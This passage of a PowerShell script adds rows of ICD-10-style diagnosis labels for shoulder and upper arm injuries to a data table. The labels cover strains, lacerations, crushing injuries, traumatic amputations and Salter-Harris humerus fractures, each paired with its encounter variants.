$DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Strain of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Laceration of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm","Other injury of other muscles, fascia and tendons at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Unspecified injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Strain of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Laceration of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm","Other injury of unspecified muscle, fascia and tendon at shoulder and upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right shoulder and upper arm","Crushing injury of right shoulder and upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right shoulder and upper arm","Crushing injury of right shoulder and upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right shoulder and upper arm","Crushing injury of right shoulder and upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left shoulder and upper arm","Crushing injury of left shoulder and upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left shoulder and upper arm","Crushing injury of left shoulder and upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left shoulder and upper arm","Crushing injury of left shoulder and upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of shoulder and upper arm, unspecified arm","Crushing injury of shoulder and upper arm, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of shoulder and upper arm, unspecified arm","Crushing injury of shoulder and upper arm, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of shoulder and upper arm, unspecified arm","Crushing injury of shoulder and upper arm, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at right shoulder joint","Complete traumatic amputation at right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at right shoulder joint","Complete traumatic amputation at right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at right shoulder joint","Complete traumatic amputation at right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at left shoulder joint","Complete traumatic amputation at left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at left shoulder joint","Complete traumatic amputation at left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at left shoulder joint","Complete traumatic amputation at left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at unspecified shoulder joint","Complete traumatic amputation at unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at unspecified shoulder joint","Complete traumatic amputation at unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at unspecified shoulder joint","Complete traumatic amputation at unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at right shoulder joint","Partial traumatic amputation at right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at right shoulder joint","Partial traumatic amputation at right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at right shoulder joint","Partial traumatic amputation at right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at left shoulder joint","Partial traumatic amputation at left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at left shoulder joint","Partial traumatic amputation at left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at left shoulder joint","Partial traumatic amputation at left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at unspecified shoulder joint","Partial traumatic amputation at unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at unspecified shoulder joint","Partial traumatic amputation at unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at unspecified shoulder joint","Partial traumatic amputation at unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between right shoulder and elbow","Complete traumatic amputation at level between right shoulder and elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between right shoulder and elbow","Complete traumatic amputation at level between right shoulder and elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between right shoulder and elbow","Complete traumatic amputation at level between right shoulder and elbow, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between left shoulder and elbow","Complete traumatic amputation at level between left shoulder and elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between left shoulder and elbow","Complete traumatic amputation at level between left shoulder and elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between left shoulder and elbow","Complete traumatic amputation at level between left shoulder and elbow, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between unspecified shoulder and elbow","Complete traumatic amputation at level between unspecified shoulder and elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between unspecified shoulder and elbow","Complete traumatic amputation at level between unspecified shoulder and elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between unspecified shoulder and elbow","Complete traumatic amputation at level between unspecified shoulder and elbow, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between right shoulder and elbow","Partial traumatic amputation at level between right shoulder and elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between right shoulder and elbow","Partial traumatic amputation at level between right shoulder and elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between right shoulder and elbow","Partial traumatic amputation at level between right shoulder and elbow, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between left shoulder and elbow","Partial traumatic amputation at level between left shoulder and elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between left shoulder and elbow","Partial traumatic amputation at level between left shoulder and elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between left shoulder and elbow","Partial traumatic amputation at level between left shoulder and elbow, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between unspecified shoulder and elbow","Partial traumatic amputation at level between unspecified shoulder and elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between unspecified shoulder and elbow","Partial traumatic amputation at level between unspecified shoulder and elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between unspecified shoulder and elbow","Partial traumatic amputation at level between unspecified shoulder and elbow, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right shoulder and upper arm, level unspecified","Complete traumatic amputation of right shoulder and upper arm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right shoulder and upper arm, level unspecified","Complete traumatic amputation of right shoulder and upper arm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right shoulder and upper arm, level unspecified","Complete traumatic amputation of right shoulder and upper arm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left shoulder and upper arm, level unspecified","Complete traumatic amputation of left shoulder and upper arm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left shoulder and upper arm, level unspecified","Complete traumatic amputation of left shoulder and upper arm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left shoulder and upper arm, level unspecified","Complete traumatic amputation of left shoulder and upper arm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified shoulder and upper arm, level unspecified","Complete traumatic amputation of unspecified shoulder and upper arm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified shoulder and upper arm, level unspecified","Complete traumatic amputation of unspecified shoulder and upper arm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified shoulder and upper arm, level unspecified","Complete traumatic amputation of unspecified shoulder and upper arm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right shoulder and upper arm, level unspecified","Partial traumatic amputation of right shoulder and upper arm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right shoulder and upper arm, level unspecified","Partial traumatic amputation of right shoulder and upper arm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right shoulder and upper arm, level unspecified","Partial traumatic amputation of right shoulder and upper arm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left shoulder and upper arm, level unspecified","Partial traumatic amputation of left shoulder and upper arm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left shoulder and upper arm, level unspecified","Partial traumatic amputation of left shoulder and upper arm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left shoulder and upper arm, level unspecified","Partial traumatic amputation of left shoulder and upper arm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified shoulder and upper arm, level unspecified","Partial traumatic amputation of unspecified shoulder and upper arm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified shoulder and upper arm, level unspecified","Partial traumatic amputation of unspecified shoulder and upper arm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified shoulder and upper arm, level unspecified","Partial traumatic amputation of unspecified shoulder and upper arm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, right arm","Unspecified physeal fracture of upper end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, right arm","Unspecified physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, right arm","Unspecified physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, right arm","Unspecified physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, right arm","Unspecified physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, right arm","Unspecified physeal fracture of upper end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, left arm","Unspecified physeal fracture of upper end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, left arm","Unspecified physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, left arm","Unspecified physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, left arm","Unspecified physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, left arm","Unspecified physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, left arm","Unspecified physeal fracture of upper end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, unspecified arm","Unspecified physeal fracture of upper end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, unspecified arm","Unspecified physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, unspecified arm","Unspecified physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, unspecified arm","Unspecified physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, unspecified arm","Unspecified physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of humerus, unspecified arm","Unspecified physeal fracture of upper end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, right arm","Salter-Harris Type I physeal fracture of upper end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, right arm","Salter-Harris Type I physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, right arm","Salter-Harris Type I physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, right arm","Salter-Harris Type I physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, right arm","Salter-Harris Type I physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, right arm","Salter-Harris Type I physeal fracture of upper end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, left arm","Salter-Harris Type I physeal fracture of upper end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, left arm","Salter-Harris Type I physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, left arm","Salter-Harris Type I physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, left arm","Salter-Harris Type I physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, left arm","Salter-Harris Type I physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, left arm","Salter-Harris Type I physeal fracture of upper end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type I physeal fracture of upper end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, right arm","Salter-Harris Type II physeal fracture of upper end of humerus, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, right arm","Salter-Harris Type II physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, right arm","Salter-Harris Type II physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, right arm","Salter-Harris Type II physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, right arm","Salter-Harris Type II physeal fracture of upper end of humerus, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, right arm","Salter-Harris Type II physeal fracture of upper end of humerus, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, left arm","Salter-Harris Type II physeal fracture of upper end of humerus, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, left arm","Salter-Harris Type II physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, left arm","Salter-Harris Type II physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, left arm","Salter-Harris Type II physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, left arm","Salter-Harris Type II physeal fracture of upper end of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, left arm","Salter-Harris Type II physeal fracture of upper end of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm","Salter-Harris Type II physeal fracture of upper end of humerus, unspecified arm, initial encounter for closed 